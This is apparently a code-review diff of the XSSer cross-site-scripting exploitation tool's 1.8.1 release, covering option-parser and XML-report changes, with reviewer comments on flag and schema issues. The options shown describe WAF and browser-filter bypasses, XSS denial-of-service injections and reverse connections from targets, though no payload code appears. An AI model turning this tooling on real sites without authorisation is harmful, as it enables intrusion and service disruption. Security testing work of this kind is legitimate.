+ 3522 - 0
core/main.py


+ 2 - 4
xsser/core/mozchecker.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 61 - 50
xsser/core/options.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -32,7 +30,7 @@ class XSSerOptions(optparse.OptionParser):
         optparse.OptionParser.__init__(self, 
         optparse.OptionParser.__init__(self, 
                            description='Cross Site "Scripter" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.',
                            description='Cross Site "Scripter" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.',
                            prog='XSSer.py',
                            prog='XSSer.py',
-			   version='\nXSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy\n',
+			   version='\nXSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net) - 2010/2019 -> by psy\n',
                            usage= '\n\nxsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}')
                            usage= '\n\nxsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}')
         self.set_defaults(verbose=False, threads=5, retries=1, delay=0, timeout=30,
         self.set_defaults(verbose=False, threads=5, retries=1, delay=0, timeout=30,
                           silent=False)
                           silent=False)
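Review bot: the version string reads `XSSer v1.8[1]` while the commit is titled "XSSer v1.8.1"; use one format (`v1.8.1`) so that `--version` output matches the release tag and the CHANGELOG.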
@@ -69,55 +67,65 @@ class XSSerOptions(optparse.OptionParser):
 
 
         group3 = optparse.OptionGroup(self, "*Select type of HTTP/HTTPS Connection(s)*",
         group3 = optparse.OptionGroup(self, "*Select type of HTTP/HTTPS Connection(s)*",
         "These options can be used to specify which parameter(s) we want to use as payload(s). Set 'XSS' as keyword on the place(s) that you want to inject:")
         "These options can be used to specify which parameter(s) we want to use as payload(s). Set 'XSS' as keyword on the place(s) that you want to inject:")
-        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=3&q=XSS')")
+        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=XSS')")
         group3.add_option("-p", action="store", dest="postdata", help="Send payload using POST (ex: 'foo=1&bar=XSS')")
         group3.add_option("-p", action="store", dest="postdata", help="Send payload using POST (ex: 'foo=1&bar=XSS')")
         group3.add_option("-c", action="store", dest="crawling", help="Number of urls to crawl on target(s): 1-99999")
         group3.add_option("-c", action="store", dest="crawling", help="Number of urls to crawl on target(s): 1-99999")
-        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default 3)")
-        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default TRUE)") 
+        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default: 2)")
+        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default: FALSE)") 
         self.add_option_group(group3)
         self.add_option_group(group3)
 
 
         group4 = optparse.OptionGroup(self, "*Configure Request(s)*",
         group4 = optparse.OptionGroup(self, "*Configure Request(s)*",
-        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:") 
+        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:")
+        group4.add_option("--head", action="store_true", dest="nohead", help="Send a HEAD request before start a test")
         group4.add_option("--cookie", action="store", dest="cookie", help="Change your HTTP Cookie header")
         group4.add_option("--cookie", action="store", dest="cookie", help="Change your HTTP Cookie header")
         group4.add_option("--drop-cookie", action="store_true", dest="dropcookie", help="Ignore Set-Cookie header from response")
         group4.add_option("--drop-cookie", action="store_true", dest="dropcookie", help="Ignore Set-Cookie header from response")
-        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default SPOOFED)")
-        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default NONE)")
+        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default: SPOOFED)")
+        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default: NONE)")
         group4.add_option("--xforw", action="store_true", dest="xforw", help="Set your HTTP X-Forwarded-For with random IP values")
         group4.add_option("--xforw", action="store_true", dest="xforw", help="Set your HTTP X-Forwarded-For with random IP values")
         group4.add_option("--xclient", action="store_true", dest="xclient", help="Set your HTTP X-Client-IP with random IP values")
         group4.add_option("--xclient", action="store_true", dest="xclient", help="Set your HTTP X-Client-IP with random IP values")
         group4.add_option("--headers", action="store", dest="headers", help="Extra HTTP headers newline separated")
         group4.add_option("--headers", action="store", dest="headers", help="Extra HTTP headers newline separated")
         group4.add_option("--auth-type", action="store", dest="atype", help="HTTP Authentication type (Basic, Digest, GSS or NTLM)") 
         group4.add_option("--auth-type", action="store", dest="atype", help="HTTP Authentication type (Basic, Digest, GSS or NTLM)") 
         group4.add_option("--auth-cred", action="store", dest="acred", help="HTTP Authentication credentials (name:password)")
         group4.add_option("--auth-cred", action="store", dest="acred", help="HTTP Authentication credentials (name:password)")
-        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)") 
+        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)")
+        group4.add_option("--check-tor", action="store_true", dest="checktor", help="Check to see if Tor is used properly")
         group4.add_option("--proxy", action="store", dest="proxy", help="Use proxy server (tor: http://localhost:8118)")
         group4.add_option("--proxy", action="store", dest="proxy", help="Use proxy server (tor: http://localhost:8118)")
         group4.add_option("--ignore-proxy", action="store_true", dest="ignoreproxy", help="Ignore system default HTTP proxy")
         group4.add_option("--ignore-proxy", action="store_true", dest="ignoreproxy", help="Ignore system default HTTP proxy")
-        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default 30)")
-        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when the connection timeouts (default 1)")
-        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent HTTP requests (default 5)") 
-        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each HTTP request (default 0)")
+        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default: 30)")
+        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when connection timeout (default: 1)")
+        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent requests (default: 5)") 
+        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each request (default: 0)")
         group4.add_option("--tcp-nodelay", action="store_true", dest="tcp_nodelay", help="Use the TCP_NODELAY option")
         group4.add_option("--tcp-nodelay", action="store_true", dest="tcp_nodelay", help="Use the TCP_NODELAY option")
         group4.add_option("--follow-redirects", action="store_true", dest="followred", help="Follow server redirection responses (302)")
         group4.add_option("--follow-redirects", action="store_true", dest="followred", help="Follow server redirection responses (302)")
-        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default 50)")
+        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default: 50)")
         self.add_option_group(group4)
         self.add_option_group(group4)
 
 
         group5 = optparse.OptionGroup(self, "*Checker Systems*",
         group5 = optparse.OptionGroup(self, "*Checker Systems*",
         "These options are useful to know if your target is using filters against XSS attacks:")
         "These options are useful to know if your target is using filters against XSS attacks:")
-        group5.add_option("--hash", action="store_true", dest="hash", help="send a hash to check if target is repeating content")
-        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="discover parameters filtered by using heuristics")
-        group5.add_option("--discode", action="store", dest="discode", help="set code on reply to discard an injection")
-        group5.add_option("--checkaturl", action="store", dest="alt", help="check reply using: alternative url -> Blind XSS")
-        group5.add_option("--checkmethod", action="store", dest="altm", help="check reply using: GET or POST (default: GET)")
-        group5.add_option("--checkatdata", action="store", dest="ald", help="check reply using: alternative payload") 
-        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="establish a reverse connection from target to XSSer to certify that is 100% vulnerable (recommended!)")
+        group5.add_option("--hash", action="store_true", dest="hash", help="Send a hash to check if target is repeating content")
+        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="Discover parameters filtered by using heuristics")
+        group5.add_option("--discode", action="store", dest="discode", help="Set code on reply to discard an injection")
+        group5.add_option("--checkaturl", action="store", dest="alt", help="Check reply using: <alternative url> [aka BLIND-XSS]")
+        group5.add_option("--checkmethod", action="store", dest="altm", help="Check reply using: GET or POST (default: GET)")
+        group5.add_option("--checkatdata", action="store", dest="ald", help="Check reply using: <alternative payload>") 
+        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="Establish a reverse connection from target to XSSer")
+        group5.add_option("--reverse-open", action="store_true", dest="reverseopen", help="Open a web browser when a reverse check is established")
         self.add_option_group(group5)
         self.add_option_group(group5)
 
 
         group6 = optparse.OptionGroup(self, "*Select Vector(s)*",
         group6 = optparse.OptionGroup(self, "*Select Vector(s)*",
         "These options can be used to specify injection(s) code. Important if you don't want to inject a common XSS vector used by default. Choose only one option:")
         "These options can be used to specify injection(s) code. Important if you don't want to inject a common XSS vector used by default. Choose only one option:")
-        group6.add_option("--payload", action="store", dest="script", help="OWN  - Inject your own code")
-        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO - Inject a list of vectors provided by XSSer")
+        group6.add_option("--payload", action="store", dest="script", help="OWN   - Inject your own code")
+        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO  - Inject a list of vectors provided by XSSer")
         self.add_option_group(group6)
         self.add_option_group(group6)
 
 
+        group14 = optparse.OptionGroup(self, "*Select Payload(s)*",
+        "These options can be used to set the list of vectors provided by XSSer. Choose only if required:")
+        group14.add_option("--auto-set", action="store", dest="fzz_num", help="ASET  - Limit of vectors to inject (default: "+str(self.vectors_fuzz)+")")
+        group14.add_option("--auto-info", action="store_true", dest="fzz_info", help="AINFO - Select ONLY vectors with INFO (defaul: FALSE)")
+        group14.add_option("--auto-random", action="store_true", dest="fzz_rand", help="ARAND - Set random to order (default: FALSE)")
+        self.add_option_group(group14)
+
         group13 = optparse.OptionGroup(self, "*Anti-antiXSS Firewall rules*",
         group13 = optparse.OptionGroup(self, "*Anti-antiXSS Firewall rules*",
-        "These options can be used to try to bypass specific WAF/IDS products. Choose only if required:")
+        "These options can be used to try to bypass specific WAF/IDS products and some anti-XSS browser filters. Choose only if required:")
         group13.add_option("--Phpids0.6.5", action="store_true", dest="phpids065", help="PHPIDS (0.6.5) [ALL]")
         group13.add_option("--Phpids0.6.5", action="store_true", dest="phpids065", help="PHPIDS (0.6.5) [ALL]")
         group13.add_option("--Phpids0.7", action="store_true", dest="phpids070", help="PHPIDS (0.7) [ALL]")
         group13.add_option("--Phpids0.7", action="store_true", dest="phpids070", help="PHPIDS (0.7) [ALL]")
         group13.add_option("--Imperva", action="store_true", dest="imperva", help="Imperva Incapsula [ALL]")
         group13.add_option("--Imperva", action="store_true", dest="imperva", help="Imperva Incapsula [ALL]")
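Review bot: the new `--head` option (`group4.add_option("--head", ...)`) keeps `dest="nohead"`, the destination of the `--no-head` flag that this same patch removes from the *Miscellaneous* group further down, so any caller that still tests `options.nohead` as "skip the HEAD request" now gets the opposite of what the user asked for; rename it to `dest="head"` and update the consumers, or keep the old flag. Two smaller points in the same region: `--auto-set` stores a vector limit but lacks `type="int"` unlike the other numeric options, so downstream code will receive a string, and the `--auto-info` help text has the typo "defaul: FALSE".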
@@ -126,6 +134,10 @@ class XSSerOptions(optparse.OptionParser):
         group13.add_option("--Barracuda", action="store_true", dest="barracuda", help="Barracuda WAF [ALL]")
         group13.add_option("--Barracuda", action="store_true", dest="barracuda", help="Barracuda WAF [ALL]")
         group13.add_option("--Modsec", action="store_true", dest="modsec", help="Mod-Security [ALL]")
         group13.add_option("--Modsec", action="store_true", dest="modsec", help="Mod-Security [ALL]")
         group13.add_option("--Quickdefense", action="store_true", dest="quickdefense", help="QuickDefense [Chrome]")
         group13.add_option("--Quickdefense", action="store_true", dest="quickdefense", help="QuickDefense [Chrome]")
+        group13.add_option("--Firefox", action="store_true", dest="firefox", help="Firefox 12 [& below]")
+        group13.add_option("--Chrome", action="store_true", dest="chrome", help="Chrome 19 & Firefox 12 [& below]")
+        group13.add_option("--Opera", action="store_true", dest="opera", help="Opera 10.5 [& below]")
+        group13.add_option("--Iexplorer", action="store_true", dest="iexplorer", help="IExplorer 9 & Firefox 12 [& below]")
         self.add_option_group(group13)
         self.add_option_group(group13)
        
        
         group7 = optparse.OptionGroup(self, "*Select Bypasser(s)*",
         group7 = optparse.OptionGroup(self, "*Select Bypasser(s)*",
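Review bot: the help texts for `--Chrome` ("Chrome 19 & Firefox 12 [& below]") and `--Iexplorer` ("IExplorer 9 & Firefox 12 [& below]") overlap with `--Firefox` ("Firefox 12 [& below]"), so it is unclear whether each flag selects one browser's filter-bypass rules or a shared set; state which rules each flag enables (or drop the "& Firefox 12" suffix) so users do not combine flags that are aliases for the same behaviour.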
@@ -142,60 +154,59 @@ class XSSerOptions(optparse.OptionParser):
         self.add_option_group(group7)
         self.add_option_group(group7)
 
 
         group8 = optparse.OptionGroup(self, "*Special Technique(s)*",
         group8 = optparse.OptionGroup(self, "*Special Technique(s)*",
-        "These options can be used to inject code using different XSS techniques. You can choose multiple:")
+        "These options can be used to inject code using different XSS techniques and fuzzing vectors. You can choose multiple:")
         group8.add_option("--Coo", action="store_true", dest="coo", help="COO - Cross Site Scripting Cookie injection")
         group8.add_option("--Coo", action="store_true", dest="coo", help="COO - Cross Site Scripting Cookie injection")
         group8.add_option("--Xsa", action="store_true", dest="xsa", help="XSA - Cross Site Agent Scripting")
         group8.add_option("--Xsa", action="store_true", dest="xsa", help="XSA - Cross Site Agent Scripting")
         group8.add_option("--Xsr", action="store_true", dest="xsr", help="XSR - Cross Site Referer Scripting")
         group8.add_option("--Xsr", action="store_true", dest="xsr", help="XSR - Cross Site Referer Scripting")
         group8.add_option("--Dcp", action="store_true", dest="dcp", help="DCP - Data Control Protocol injections")
         group8.add_option("--Dcp", action="store_true", dest="dcp", help="DCP - Data Control Protocol injections")
         group8.add_option("--Dom", action="store_true", dest="dom", help="DOM - Document Object Model injections")
         group8.add_option("--Dom", action="store_true", dest="dom", help="DOM - Document Object Model injections")
         group8.add_option("--Ind", action="store_true", dest="inducedcode", help="IND - HTTP Response Splitting Induced code")
         group8.add_option("--Ind", action="store_true", dest="inducedcode", help="IND - HTTP Response Splitting Induced code")
-        group8.add_option("--Anchor", action="store_true", dest="anchor", help="ANC - Use Anchor Stealth payloader (DOM shadows!)")
         self.add_option_group(group8)
         self.add_option_group(group8)
 
 
         group9 = optparse.OptionGroup(self, "*Select Final injection(s)*",
         group9 = optparse.OptionGroup(self, "*Select Final injection(s)*",
         "These options can be used to specify the final code to inject on vulnerable target(s). Important if you want to exploit 'on-the-wild' the vulnerabilities found. Choose only one option:")
         "These options can be used to specify the final code to inject on vulnerable target(s). Important if you want to exploit 'on-the-wild' the vulnerabilities found. Choose only one option:")
         group9.add_option("--Fp", action="store", dest="finalpayload", help="OWN    - Exploit your own code")
         group9.add_option("--Fp", action="store", dest="finalpayload", help="OWN    - Exploit your own code")
         group9.add_option("--Fr", action="store", dest="finalremote", help="REMOTE - Exploit a script -remotely-")
         group9.add_option("--Fr", action="store", dest="finalremote", help="REMOTE - Exploit a script -remotely-")
-        group9.add_option("--Doss", action="store_true", dest="doss", help="DOSs   - XSS (server) Denial of Service")
-        group9.add_option("--Dos", action="store_true", dest="dos", help="DOS    - XSS (client) Denial of Service")
-        group9.add_option("--B64", action="store_true", dest="b64", help="B64    - Base64 code encoding in META tag (rfc2397)")
         self.add_option_group(group9)
         self.add_option_group(group9)
         
         
         group10 = optparse.OptionGroup(self, "*Special Final injection(s)*",
         group10 = optparse.OptionGroup(self, "*Special Final injection(s)*",
-        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):")
-        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM - Use onMouseMove() event")
-        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR - Use <iframe> source tag")
+        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP exploits):")
+        group10.add_option("--Anchor", action="store_true", dest="anchor", help="ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)")
+        group10.add_option("--B64", action="store_true", dest="b64", help="B64  - Base64 code encoding in META tag (rfc2397)")
+        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM  - Use onMouseMove() event")
+        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR  - Use <iframe> source tag")
+        group10.add_option("--Dos", action="store_true", dest="dos", help="DOS  - XSS (client) Denial of Service")
+        group10.add_option("--Doss", action="store_true", dest="doss", help="DOSs - XSS (server) Denial of Service")
         self.add_option_group(group10)
         self.add_option_group(group10)
 
 
         group11 = optparse.OptionGroup(self, "*Reporting*")
         group11 = optparse.OptionGroup(self, "*Reporting*")
-        group11.add_option("--save", action="store_true", dest="fileoutput", help="export to file (XSSreport.raw)")
-        group11.add_option("--xml", action="store", dest="filexml", help="export to XML (--xml file.xml)")
+        group11.add_option("--save", action="store_true", dest="fileoutput", help="Export to file (XSSreport.raw)")
+        group11.add_option("--xml", action="store", dest="filexml", help="Export to XML (--xml file.xml)")
         self.add_option_group(group11)
         self.add_option_group(group11)
 
 
         group12 = optparse.OptionGroup(self, "*Miscellaneous*")
         group12 = optparse.OptionGroup(self, "*Miscellaneous*")
-        group12.add_option("--silent", action="store_true", dest="silent", help="inhibit console output results")
-        group12.add_option("--no-head", action="store_true", dest="nohead", help="NOT send a HEAD request before start a test")
-        group12.add_option("--alive", action="store", dest="isalive", type="int", help="set limit of errors before check if target is alive")
-        group12.add_option("--update", action="store_true", dest="update", help="check for latest stable version")
+        group12.add_option("--silent", action="store_true", dest="silent", help="Inhibit console output results")
+        group12.add_option("--alive", action="store", dest="isalive", type="int", help="Set limit of errors before check if target is alive")
+        group12.add_option("--update", action="store_true", dest="update", help="Check for latest stable version")
         self.add_option_group(group12)
         self.add_option_group(group12)
 
 
     def get_options(self, user_args=None):
     def get_options(self, user_args=None):
         (options, args) = self.parse_args(user_args)
         (options, args) = self.parse_args(user_args)
-        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target):
+        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target and not options.checktor):
             print "\n", '='*75
             print "\n", '='*75
             print self.version
             print self.version
             print "-----------", "\n"
             print "-----------", "\n"
             print self.description, "\n"
             print self.description, "\n"
             print '='*75
             print '='*75
             print ""
             print ""
-            print "                                       \\ \\                           %"
-            print "Project site:","                          \\ \\     LulZzzz!           %  "
-            print "http://xsser.03c8.net                 %% \\_\\                      %   "
-            print "                                      \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)         Bbzzzzz!      %  "
-            print "                                       \== < ==                  %      "
-            print "Forum:                                    / \_      ==       %          "
-            print "irc.freenode.net -> #xsser              (')   \   *=====%             "
-            print "                                       /  /       ========              "
+            print "                                \\ \\   LulZzzz!    /\                          "
+            print "Project site:","                && \\ \\            /\())\          %  %        "
+            print "https://xsser.03c8.net       &&&& \\_\\          (())\\))  %   %        %       " 
+            print "                              \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)      * //\\//\\%                 %  %"
+            print "                              || == < ==   * * \\//))//)  BBzzzzz!              "
+            print "Forum:                        ||]~~/ \~~[ *    (())//))                         "
+            print "irc.freenode.net -> #xsser    ||   (')          \/())/                          "
+            print "                              ||  /  /            \/                            "
             print ""
             print ""
             print '='*75
             print '='*75
             print "Total vectors:", self.total_vectors + " = XSS: " + str(self.vectors_fuzz) + " + DCP: " + str(self.vectors_dcp) + " + DOM: " + str(self.vectors_dom) + " + HTTPsr: " + str(self.vectors_httpsr)
             print "Total vectors:", self.total_vectors + " = XSS: " + str(self.vectors_fuzz) + " + DCP: " + str(self.vectors_dcp) + " + DOM: " + str(self.vectors_dom) + " + HTTPsr: " + str(self.vectors_httpsr)
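Review bot: adding `not options.checktor` to the usage guard in `get_options` turns `--check-tor` into a standalone mode, yet the flag sits in the *Configure Request(s)* group with a help string that reads as a per-request setting; nothing in this hunk shows what happens after parsing when `--check-tor` is the only argument, so confirm that the caller runs the Tor check and exits instead of proceeding to a scan with no target, and say in the help that the flag can be used on its own. Also worth recording in the CHANGELOG: moving `--Dos`, `--Doss` and `--B64` from *Select Final injection(s)* ("Choose only one option") to *Special Final injection(s)* ("You can select multiple") changes which option combinations are accepted.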

+ 2 - 4
xsser/core/post/__init__.py

@@ -1,9 +1,7 @@
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
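Review bot: the copyright line changes the start year from 2011 to 2010 as well as the end year; if the earlier date is intentional, make sure the same range is used in doc/AUTHOR and the other module headers touched by this release so the notices stay consistent.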

+ 45 - 23
xsser/core/post/xml_exporter.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -31,8 +29,7 @@ class xml_reporting(object):
     def __init__(self, xsser):
     def __init__(self, xsser):
         # initialize main XSSer
         # initialize main XSSer
         self.instance = xsser
         self.instance = xsser
-
-	# some counters
+	    # some counters
         self.xsr_found = 0
         self.xsr_found = 0
         self.xsa_found = 0
         self.xsa_found = 0
         self.coo_found = 0
         self.coo_found = 0
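Review bot: the re-indented `# some counters` line still starts with a tab followed by spaces, while the file's modeline asks for `expandtab` and every neighbouring line uses eight spaces; replace the tab with spaces so the file does not mix indentation styles (harmless on a comment line, but linters will flag it and it is one copy-paste away from an indentation error on a code line).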
@@ -47,7 +44,6 @@ class xml_reporting(object):
         title.text = "XSSer Security Report: " + str(datetime.datetime.now())
         title.text = "XSSer Security Report: " + str(datetime.datetime.now())
         abstract = ET.SubElement(root, "abstract")
         abstract = ET.SubElement(root, "abstract")
         total_injections = len(self.instance.hash_found) + len(self.instance.hash_notfound)
         total_injections = len(self.instance.hash_found) + len(self.instance.hash_notfound)
-
         if len(self.instance.hash_found) + len(self.instance.hash_notfound) == 0:
         if len(self.instance.hash_found) + len(self.instance.hash_notfound) == 0:
             pass 
             pass 
         injections = ET.SubElement(abstract, "injections")
         injections = ET.SubElement(abstract, "injections")
@@ -55,9 +51,7 @@ class xml_reporting(object):
         failed_inj = ET.SubElement(injections, "failed")
         failed_inj = ET.SubElement(injections, "failed")
         success_inj = ET.SubElement(injections, "successful")
         success_inj = ET.SubElement(injections, "successful")
         accur_inj = ET.SubElement(injections, "accur")
         accur_inj = ET.SubElement(injections, "accur")
-
         total_inj_i = len(self.instance.hash_found) + len(self.instance.hash_notfound)
         total_inj_i = len(self.instance.hash_found) + len(self.instance.hash_notfound)
-
         total_inj.text = str(total_inj_i)
         total_inj.text = str(total_inj_i)
         failed_inj.text = str(len(self.instance.hash_notfound))
         failed_inj.text = str(len(self.instance.hash_notfound))
         success_inj.text = str(len(self.instance.hash_found))
         success_inj.text = str(len(self.instance.hash_found))
@@ -65,7 +59,6 @@ class xml_reporting(object):
             accur_inj.text = "%s %%" % (str((len(self.instance.hash_found) * 100) / total_inj_i), )
             accur_inj.text = "%s %%" % (str((len(self.instance.hash_found) * 100) / total_inj_i), )
         except ZeroDivisionError:
         except ZeroDivisionError:
             accur_inj.text = "0 %"
             accur_inj.text = "0 %"
-
         if self.instance.options.statistics:
         if self.instance.options.statistics:
             stats = ET.SubElement(root, "stats")
             stats = ET.SubElement(root, "stats")
             test_time = datetime.datetime.now() - self.instance.time
             test_time = datetime.datetime.now() - self.instance.time
@@ -103,7 +96,7 @@ class xml_reporting(object):
         results = ET.SubElement(root, "results")
         results = ET.SubElement(root, "results")
         for line in self.instance.hash_found:
         for line in self.instance.hash_found:
             attack = ET.SubElement(results, "attack")
             attack = ET.SubElement(results, "attack")
-            url_ = ET.SubElement(attack, "injection")
+            url_ = ET.SubElement(attack, "payload")
             url_.text = line[0]
             url_.text = line[0]
             attack_url = self.instance.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
             attack_url = self.instance.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
             if self.instance.options.onm or self.instance.options.ifr or self.instance.options.b64  or self.instance.options.dos or self.instance.options.doss or self.instance.options.finalremote or self.instance.options.finalpayload:
             if self.instance.options.onm or self.instance.options.ifr or self.instance.options.b64  or self.instance.options.dos or self.instance.options.doss or self.instance.options.finalremote or self.instance.options.finalpayload:
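Review bot: renaming the `<injection>` element to `<payload>` changes the XML report schema, and this hunk shows no versioning or documentation of it, so any consumer that parses the previous reports will silently lose the field; record the new element names in the CHANGELOG/README (this release also renames `<browsers>` and `<method>` later in the file) or emit the old name alongside the new one for a release.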
@@ -116,42 +109,42 @@ class xml_reporting(object):
                 if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_found > 1:
                 if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_found > 1:
                     pass
                     pass
                 else:
                 else:
-                    aurl.text = "Cross Site Referer Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "XSR Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "xsa":
             elif line[2] == "xsa":
                 self.xsa_found = self.xsa_found +1
                 self.xsa_found = self.xsa_found +1
                 xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_found > 1:
                 if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_found > 1:
                     pass
                     pass
                 else:
                 else:
-                    aurl.text = "Cross Site Agent Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "XSA Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "coo":
             elif line[2] == "coo":
                 self.coo_found = self.coo_found +1
                 self.coo_found = self.coo_found +1
                 coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_found > 1:
                 if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_found > 1:
                     pass
                     pass
                 else:
                 else:
-                    aurl.text = "Cross Site Cookie Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "Cookie Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "dcp":
             elif line[2] == "dcp":
                 self.dcp_found = self.dcp_found +1
                 self.dcp_found = self.dcp_found +1
                 dcp_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 dcp_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if dcp_vulnerable_host[0]["payload"] == line[4] and dcp_vulnerable_host[0]["target"] == line[6] and self.dcp_found > 1:
